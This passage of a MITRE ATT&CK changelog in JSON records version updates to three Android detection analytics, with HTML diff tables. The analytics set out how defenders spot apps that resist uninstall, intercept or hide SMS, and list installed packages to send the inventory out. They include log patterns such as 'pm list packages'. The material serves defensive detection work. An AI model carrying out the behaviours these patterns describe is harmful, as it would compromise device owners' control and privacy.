class=\"diff_header\">></td><td nowrap=\"nowrap\">iny&nbsp;could&nbsp;be&nbsp;applied&nbsp;to&nbsp;those&nbsp;that&nbsp;request&nbsp;it.&nbsp;&nbsp;On&nbsp;Android,&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">scrutiny&nbsp;could&nbsp;be&nbsp;applied&nbsp;to&nbsp;those&nbsp;that&nbsp;request&nbsp;it.&nbsp;&nbsp;On&nbsp;Andr</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">the&nbsp;user&nbsp;can&nbsp;manage&nbsp;which&nbsp;applications&nbsp;have&nbsp;permission&nbsp;to&nbsp;ac</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">oid,&nbsp;the&nbsp;user&nbsp;can&nbsp;manage&nbsp;which&nbsp;applications&nbsp;have&nbsp;permission&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">cess&nbsp;SMS&nbsp;messages&nbsp;through&nbsp;the&nbsp;device&nbsp;settings&nbsp;screen,&nbsp;revoki</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">to&nbsp;access&nbsp;SMS&nbsp;messages&nbsp;through&nbsp;the&nbsp;device&nbsp;settings&nbsp;screen,&nbsp;r</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ng&nbsp;the&nbsp;permission&nbsp;if&nbsp;necessary.</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">evoking&nbsp;the&nbsp;permission&nbsp;if&nbsp;necessary.<span class=\"diff_add\">&nbsp;&nbsp;NEW:&nbsp;A&nbsp;defender&nbsp;observ</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">es&nbsp;an&nbsp;Android&nbsp;application&nbsp;requesting&nbsp;for&nbsp;`android.permission</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">.&nbsp;READ_SMS`&nbsp;and/or&nbsp;`&nbsp;android.permission.&nbsp;RECEIVE_SMS&nbsp;`,&nbsp;whic</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">h&nbsp;may&nbsp;also&nbsp;be&nbsp;listed&nbsp;in&nbsp;the&nbsp;application's&nbsp;manifest&nbsp;file.&nbsp;</span></td></tr>\n        </tbody>\n    </table>"
                }
            ],
            "minor_version_changes": [
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--23a1b062-847e-4912-8e5e-5b69867af4a4",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-04-24 20:30:18.846000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0598#AN1644",
                            "external_id": "AN1644"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1644",
                    "description": "Correlates (1) an application obtaining or maintaining elevated control mechanisms capable of resisting removal (device administrator, accessibility control, managed-owner posture), (2) user navigation into uninstall or application-management flows, and (3) immediate UI redirection, back-navigation injection, modal dismissal, or failed uninstall completion followed by continued app presence. Defender observes a causal chain where a removal attempt is actively disrupted and the target application remains installed.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "android:MDMLog",
                            "channel": "application enabled as device administrator, device owner, profile owner, or equivalent elevated management role before uninstall attempt"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "android:MDMLog",
                            "channel": "application granted accessibility service privileges capable of screen observation or global action invocation before removal attempt"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "application invokes accessibility global actions (back/home/recents) or observes package-management UI immediately after uninstall/settings screen becomes foreground"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window between uninstall UI entry, interference event, and continued install state"
                        },
                        {
                            "field": "ProtectedRoleSet",
                            "description": "Set of elevated roles considered removal-resistant (device admin, owner modes, accessibility)"
                        },
                        {
                            "field": "GlobalActionSet",
                            "description": "UI actions considered suspicious during uninstall flows (BACK, HOME, RECENTS)"
                        },
                        {
                            "field": "AllowedAccessibilityApps",
                            "description": "Known legitimate accessibility services expected to use global actions"
                        },
                        {
                            "field": "UninstallRetryThreshold",
                            "description": "Number of repeated uninstall attempts before escalation"
                        },
                        {
                            "field": "UplinkBytesThreshold",
                            "description": "Outbound traffic threshold confirming continued meaningful activity after failed removal"
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Correlation window between uninstall UI entry, interference event, and continued install state\"}, {\"field\": \"ProtectedRoleSet\", \"description\": \"Set of elevated roles considered removal-resistant (device admin, owner modes, accessibility)\"}, {\"field\": \"GlobalActionSet\", \"description\": \"UI actions considered suspicious during uninstall flows (BACK, HOME, RECENTS)\"}, {\"field\": \"AllowedAccessibilityApps\", \"description\": \"Known legitimate accessibility services expected to use global actions\"}, {\"field\": \"UninstallRetryThreshold\", \"description\": \"Number of repeated uninstall attempts before escalation\"}, {\"field\": \"UplinkBytesThreshold\", \"description\": \"Outbound traffic threshold confirming continued meaningful activity after failed removal\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-24 20:30:18.846000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Correlates (1) an application obtaining or maintaining elevated control mechanisms capable of resisting removal (device administrator, accessibility control, managed-owner posture), (2) user navigation into uninstall or application-management flows, and (3) immediate UI redirection, back-navigation injection, modal dismissal, or failed uninstall completion followed by continued app presence. Defender observes a causal chain where a removal attempt is actively disrupted and the target application remains installed.\", \"old_value\": \"Application vetting services may detect API calls to `performGlobalAction(int)`. \\nThe user can view a list of device administrators and applications that have registered accessibility services in device settings. The user can typically visually see when an action happens that they did not initiate and can subsequently review installed applications for any out of place or unknown ones. Applications that register an accessibility service or request device administrator permissions should be scrutinized further for malicious behavior.\", \"diff\": \"--- \\n+++ \\n@@ -1,2 +1 @@\\n-Application vetting services may detect API calls to `performGlobalAction(int)`. \\n-The user can view a list of device administrators and applications that have registered accessibility services in device settings. The user can typically visually see when an action happens that they did not initiate and can subsequently review installed applications for any out of place or unknown ones. Applications that register an accessibility service or request device administrator permissions should be scrutinized further for malicious behavior.\\n+Correlates (1) an application obtaining or maintaining elevated control mechanisms capable of resisting removal (device administrator, accessibility control, managed-owner posture), (2) user navigation into uninstall or application-management flows, and (3) immediate UI redirection, back-navigation injection, modal dismissal, or failed uninstall completion followed by continued app presence. Defender observes a causal chain where a removal attempt is actively disrupted and the target application remains installed.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"android:MDMLog\", \"channel\": \"application enabled as device administrator, device owner, profile owner, or equivalent elevated management role before uninstall attempt\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}, \"root['x_mitre_log_source_references'][1]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"android:MDMLog\", \"channel\": \"application granted accessibility service privileges capable of screen observation or global action invocation before removal attempt\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6\", \"name\": \"User Interface\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"application invokes accessibility global actions (back/home/recents) or observes package-management UI immediately after uninstall/settings screen becomes foreground\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to190__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to190__0\"><a href=\"#difflib_chg_to190__top\">t</a></td><td class=\"diff_header\" id=\"from190_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Application&nbsp;vetting&nbsp;services&nbsp;may&nbsp;detect&nbsp;API&nbsp;calls&nbsp;to&nbsp;`perfor</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to190__top\">t</a></td><td class=\"diff_header\" id=\"to190_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Correlates&nbsp;(1)&nbsp;an&nbsp;application&nbsp;obtaining&nbsp;or&nbsp;maintaining&nbsp;eleva</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">mGlobalAction(int)`.&nbsp;&nbsp;The&nbsp;user&nbsp;can&nbsp;view&nbsp;a&nbsp;list&nbsp;of&nbsp;device&nbsp;adm</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ted&nbsp;control&nbsp;mechanisms&nbsp;capable&nbsp;of&nbsp;resisting&nbsp;removal&nbsp;(device&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">inistrators&nbsp;and&nbsp;applications&nbsp;that&nbsp;have&nbsp;registered&nbsp;accessibil</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">administrator,&nbsp;accessibility&nbsp;control,&nbsp;managed-owner&nbsp;posture)</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ity&nbsp;services&nbsp;in&nbsp;device&nbsp;settings.&nbsp;The&nbsp;user&nbsp;can&nbsp;typically&nbsp;visu</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">,&nbsp;(2)&nbsp;user&nbsp;navigation&nbsp;into&nbsp;uninstall&nbsp;or&nbsp;application-manageme</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ally&nbsp;see&nbsp;when&nbsp;an&nbsp;action&nbsp;happens&nbsp;that&nbsp;they&nbsp;did&nbsp;not&nbsp;initiate&nbsp;a</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">nt&nbsp;flows,&nbsp;and&nbsp;(3)&nbsp;immediate&nbsp;UI&nbsp;redirection,&nbsp;back-navigation&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">nd&nbsp;can&nbsp;subsequently&nbsp;review&nbsp;installed&nbsp;applications&nbsp;for&nbsp;any&nbsp;ou</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">injection,&nbsp;modal&nbsp;dismissal,&nbsp;or&nbsp;failed&nbsp;uninstall&nbsp;completion&nbsp;f</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">t&nbsp;of&nbsp;place&nbsp;or&nbsp;unknown&nbsp;ones.&nbsp;Applications&nbsp;that&nbsp;register&nbsp;an&nbsp;ac</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ollowed&nbsp;by&nbsp;continued&nbsp;app&nbsp;presence.&nbsp;Defender&nbsp;observes&nbsp;a&nbsp;causa</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">cessibility&nbsp;service&nbsp;or&nbsp;request&nbsp;device&nbsp;administrator&nbsp;permissi</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">l&nbsp;chain&nbsp;where&nbsp;a&nbsp;removal&nbsp;attempt&nbsp;is&nbsp;actively&nbsp;disrupted&nbsp;and&nbsp;th</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ons&nbsp;should&nbsp;be&nbsp;scrutinized&nbsp;further&nbsp;for&nbsp;malicious&nbsp;behavior.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">e&nbsp;target&nbsp;application&nbsp;remains&nbsp;installed.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--a69604d3-2909-46bf-afd3-39b47ac5e5fd",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-04-09 16:57:33.679000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0599#AN1645",
                            "external_id": "AN1645"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1645",
                    "description": "The defender correlates SMS-relevant permission state or default SMS handler role with subsequent unauthorized SMS send, receive interception, message database modification, deletion, or concealment behavior by an application outside expected messaging workflows. The analytic prioritizes Android-observable control-plane effects: SEND_SMS or RECEIVE_SMS capability, default SMS handler change or exercise of SMS_DELIVER semantics, direct interaction with the SMS content provider or messaging database, and SMS activity occurring from background or locked-device state without recent user interaction.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "android:MDMLog",
                            "channel": "Managed app granted SEND_SMS or RECEIVE_SMS permission, or app role/policy indicates SMS-capable behavior inconsistent with approved enterprise function before SMS control activity"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "android:MDMLog",
                            "channel": "Default SMS handler changes to non-baselined application or managed app unexpectedly becomes or remains device default SMS app during SMS control phase"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "Application invokes SMS send, intercept, delete, or provider-write behavior, including handling SMS_DELIVER or interacting with SMS content provider during unauthorized message-control phase"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--84572de3-9583-4c73-aabd-06ea88123dd8",
                            "name": "MobileEDR:telemetry",
                            "channel": "Application inserts, updates, deletes, hides, or marks message records in SMS store or messaging database immediately after SMS receive or send event"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window between permission or role change, SMS control activity, message-store modification, and any follow-on network communication"
                        },
                        {
                            "field": "AllowedAppList",
                            "description": "Apps legitimately expected to send or manage SMS, such as default messaging apps, carrier tools, device migration apps, or approved enterprise communications apps"
                        },
                        {
                            "field": "AllowedDefaultSMSHandlers",
                            "description": "Approved packages allowed to become the default SMS handler on managed devices"
                        },
                        {
                            "field": "AllowedDestinationList",
                            "description": "Approved network destinations associated with legitimate messaging synchronization or carrier workflows"
                        },
                        {
                            "field": "ForegroundStateRequired",
                            "description": "Whether SMS send or message modification should occur only during active user-driven workflows"
                        },
                        {
                            "field": "MessageModificationThreshold",
                            "description": "Number of insert, update, or delete operations against SMS store within a short interval required before alerting"
                        },
                        {
                            "field": "SMSSendRateThreshold",
                            "description": "Maximum expected SMS send frequency for legitimate app behavior"
                        },
                        {
                            "field": "HighRiskNumberPatterns",
                            "description": "Environment-specific list of premium-rate, adversary-known, or non-business SMS destination patterns"
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Correlation window between permission or role change, SMS control activity, message-store modification, and any follow-on network communication\"}, {\"field\": \"AllowedAppList\", \"description\": \"Apps legitimately expected to send or manage SMS, such as default messaging apps, carrier tools, device migration apps, or approved enterprise communications apps\"}, {\"field\": \"AllowedDefaultSMSHandlers\", \"description\": \"Approved packages allowed to become the default SMS handler on managed devices\"}, {\"field\": \"AllowedDestinationList\", \"description\": \"Approved network destinations associated with legitimate messaging synchronization or carrier workflows\"}, {\"field\": \"ForegroundStateRequired\", \"description\": \"Whether SMS send or message modification should occur only during active user-driven workflows\"}, {\"field\": \"MessageModificationThreshold\", \"description\": \"Number of insert, update, or delete operations against SMS store within a short interval required before alerting\"}, {\"field\": \"SMSSendRateThreshold\", \"description\": \"Maximum expected SMS send frequency for legitimate app behavior\"}, {\"field\": \"HighRiskNumberPatterns\", \"description\": \"Environment-specific list of premium-rate, adversary-known, or non-business SMS destination patterns\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-09 16:57:33.679000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"The defender correlates SMS-relevant permission state or default SMS handler role with subsequent unauthorized SMS send, receive interception, message database modification, deletion, or concealment behavior by an application outside expected messaging workflows. The analytic prioritizes Android-observable control-plane effects: SEND_SMS or RECEIVE_SMS capability, default SMS handler change or exercise of SMS_DELIVER semantics, direct interaction with the SMS content provider or messaging database, and SMS activity occurring from background or locked-device state without recent user interaction.\", \"old_value\": \"The user can view the default SMS handler in system settings.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"android:MDMLog\", \"channel\": \"Managed app granted SEND_SMS or RECEIVE_SMS permission, or app role/policy indicates SMS-capable behavior inconsistent with approved enterprise function before SMS control activity\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6\", \"name\": \"User Interface\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][1]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"android:MDMLog\", \"channel\": \"Default SMS handler changes to non-baselined application or managed app unexpectedly becomes or remains device default SMS app during SMS control phase\"}, \"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Application invokes SMS send, intercept, delete, or provider-write behavior, including handling SMS_DELIVER or interacting with SMS content provider during unauthorized message-control phase\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--84572de3-9583-4c73-aabd-06ea88123dd8\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Application inserts, updates, deletes, hides, or marks message records in SMS store or messaging database immediately after SMS receive or send event\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to195__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to195__0\"><a href=\"#difflib_chg_to195__top\">t</a></td><td class=\"diff_header\" id=\"from195_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">The&nbsp;user&nbsp;can&nbsp;view&nbsp;the&nbsp;default&nbsp;SMS&nbsp;handler&nbsp;in&nbsp;system&nbsp;settings</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to195__top\">t</a></td><td class=\"diff_header\" id=\"to195_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">The&nbsp;defender&nbsp;correlates&nbsp;SMS-relevant&nbsp;permission&nbsp;state&nbsp;or&nbsp;def</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ault&nbsp;SMS&nbsp;handler&nbsp;role&nbsp;with&nbsp;subsequent&nbsp;unauthorized&nbsp;SMS&nbsp;send,</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;receive&nbsp;interception,&nbsp;message&nbsp;database&nbsp;modification,&nbsp;deleti</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">on,&nbsp;or&nbsp;concealment&nbsp;behavior&nbsp;by&nbsp;an&nbsp;application&nbsp;outside&nbsp;expect</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ed&nbsp;messaging&nbsp;workflows.&nbsp;The&nbsp;analytic&nbsp;prioritizes&nbsp;Android-obs</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ervable&nbsp;control-plane&nbsp;effects:&nbsp;SEND_SMS&nbsp;or&nbsp;RECEIVE_SMS&nbsp;capab</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ility,&nbsp;default&nbsp;SMS&nbsp;handler&nbsp;change&nbsp;or&nbsp;exercise&nbsp;of&nbsp;SMS_DELIVER</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;semantics,&nbsp;direct&nbsp;interaction&nbsp;with&nbsp;the&nbsp;SMS&nbsp;content&nbsp;provider</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;or&nbsp;messaging&nbsp;database,&nbsp;and&nbsp;SMS&nbsp;activity&nbsp;occurring&nbsp;from&nbsp;back</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ground&nbsp;or&nbsp;locked-device&nbsp;state&nbsp;without&nbsp;recent&nbsp;user&nbsp;interactio</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">n.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--992c6fa4-689c-4ce1-883f-f48a8b1c5ccc",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-01-29 20:03:14.269000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0600#AN1646",
                            "external_id": "AN1646"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1646",
                    "description": "Defender correlates an app enumerating installed packages (PackageManager queries or shell 'pm list packages') with selective checks for high-value targets (banking/identity/security apps) and near-term persistence/egress of the inventory. Chain: capability to query apps \u2192 burst of enumeration calls or shell listing \u2192 optional foreground target detection \u2192 local inventory file \u2192 small POST to remote endpoint.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "android:logcat",
                            "channel": "PackageManager getInstalledApplications|getInstalledPackages|getPackagesHoldingPermissions burst for <pkg>. TYPE_WINDOW_STATE_CHANGED shows foreground app then immediate package queries by <pkg>"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0",
                            "name": "android:logcat",
                            "channel": "Command 'pm list packages' executed by app sandbox or child proc"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
                            "name": "android:logcat",
                            "channel": "CREATE/WRITE /data/data/<pkg>/(files|databases)/(app_inventory|pkg_list).*\\\\.(json|txt|db)"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindowSeconds",
                            "description": "Max time from enumeration to persist/exfil (e.g., 10\u2013120s)."
                        },
                        {
                            "field": "MinEnumCount",
                            "description": "Minimum count of package queries or listed rows to treat as inventory (e.g., \u226550)."
                        },
                        {
                            "field": "TargetAppWatchlist",
                            "description": "List of sensitive app package prefixes (banking/IdP/AV/MDM) to raise severity."
                        },
                        {
                            "field": "PersistPathRegex",
                            "description": "Regex for inventory artifacts in the app container."
                        },
                        {
                            "field": "ExfilDomainAllowlist",
                            "description": "Known-good analytics/CDN endpoints to suppress FPs."
                        },
                        {
                            "field": "UserContext",
                            "description": "Work Profile/Kiosk/Jamf/Intune policy context to scope benign inventory jobs."
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
